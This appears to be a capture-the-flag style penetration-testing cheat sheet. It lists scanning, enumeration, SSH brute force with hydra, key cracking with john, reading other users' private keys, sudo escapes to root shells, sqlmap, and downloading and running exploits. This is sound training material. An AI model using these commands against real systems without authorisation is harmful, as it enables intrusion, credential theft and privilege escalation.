Pentest Commands

Attack Flow
Standard Methodology: SCAN → ENUMERATE → FIND CREDS → LOGIN → EXPLORE → PRIVESC → ROOT FLAG
Reconnaissance
nmap — Port Scanning
Basic scan
nmap -sV -sC <IP>
Scans common ports, detects versions, runs default scripts.
All ports
nmap -p- <IP>
Scans all 65535 ports. Finds services on non-standard ports.
Port range + only open
nmap -p 1-1000 --open <IP>
Full combo + save
nmap -sV -sC -p- -A -oN results.txt <IP>
-sV     Detect service versions
-sC     Run default scripts
-p-     Scan ALL 65535 ports
-A      Aggressive: OS detection + scripts
--open  Show only open ports
-oN     Save output to file
gobuster — Directory Bruteforce
Basic
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt
With extensions
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
Custom port
gobuster dir -u http://<IP>:8080 -w /usr/share/wordlists/dirb/common.txt
Finds hidden directories. Try both port 80 and 8080 if one fails.
-u     Target URL
-w     Wordlist path
-x     File extensions
-t 50  Thread count (faster)
Enumeration
enum4linux — SMB
enum4linux <IP>
Extracts usernames, shares, OS info from SMB (139/445). Look for Unix usernames — use them for SSH brute force.
List shares manually
smbclient -L //<IP> -N
FTP — Anonymous Login
ftp <IP>
Username: anonymous — password: just press Enter.
Inside FTP
passive
ls
cd pub
get file.txt
quit
⚠ If ls hangs, type passive to toggle transfer mode.
Password Attacks
hydra — Brute Force SSH
Port 22
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
Custom port
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP> -s 2222 -t 4
Unzip rockyou if needed
gunzip /usr/share/wordlists/rockyou.txt.gz
-l    Single username
-L    Username list file
-P    Password wordlist
-s    Custom port
-t 4  Threads
john — Crack Key Passphrase
Convert SSH key to hash
ssh2john key_rsa > hash.txt
Crack hash
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
For SSH private keys protected by a passphrase. Run on your local machine, not the target.
⚠ Fix permissions first: chmod 600 key_rsa
Initial Access
SSH — Login
Password
ssh <user>@<IP>
Custom port
ssh <user>@<IP> -p 2222
Private key
chmod 600 key_rsa
ssh -i key_rsa <user>@<IP>
Web — Check Before Brute
robots.txt     Often contains passwords or hints
Page source    Ctrl+U — look for hidden usernames
HTML comments  <!-- hidden info -->
/assets/       Config files or backups
Read robots.txt
curl http://<IP>/robots.txt
Privilege Escalation
Recon — Once Inside
Check sudo permissions
sudo -l
Most important command after login. Shows what you can run as root.
SUID binaries
find / -perm -4000 2>/dev/null
Check other users' SSH keys
ls /home
ls -la /home/<user>/.ssh/
cat /home/<user>/.ssh/id_rsa
Readable id_rsa = instant access as that user.
Escape to Root Shell
vim
sudo vim -c ':!/bin/bash'
python3
sudo python3 -c 'import os; os.system("/bin/bash")'
find
sudo find / -exec /bin/bash \;
less
sudo less /etc/passwd # then type: !/bin/bash
gtfobins.github.io — search any binary to see whether it can be abused when run via sudo or as SUID
CVEs & Exploits
searchsploit
Search
searchsploit <service> <version>
Copy to current dir
searchsploit -m <path/to/exploit>
Download and run
wget <URL>
python3 exploit.py -u http://<IP>/
Notable CVEs
CVE-2020-1938 Ghostcat — AJP port 8009, Tomcat < 9.0.31. File read/RCE
CVE-2017-5638 Apache Struts REST RCE. Struts 2.5 < 2.5.16
CVE-2019-9053 CMS Made Simple — blind time-based SQLi
CVE-2021-4034 PwnKit — pkexec privesc to root
Misc
One-liners
Read file without cat
less file.txt
tac file.txt
grep . file.txt
strings file.txt
Find file by name
find / -name "*.txt" 2>/dev/null
find / -name shadow 2>/dev/null
sqlmap
sqlmap -u "http://<IP>/page?id=1" --dbs
Current user
whoami
id
Command history
history
Install pip package
pip install <package> --break-system-packages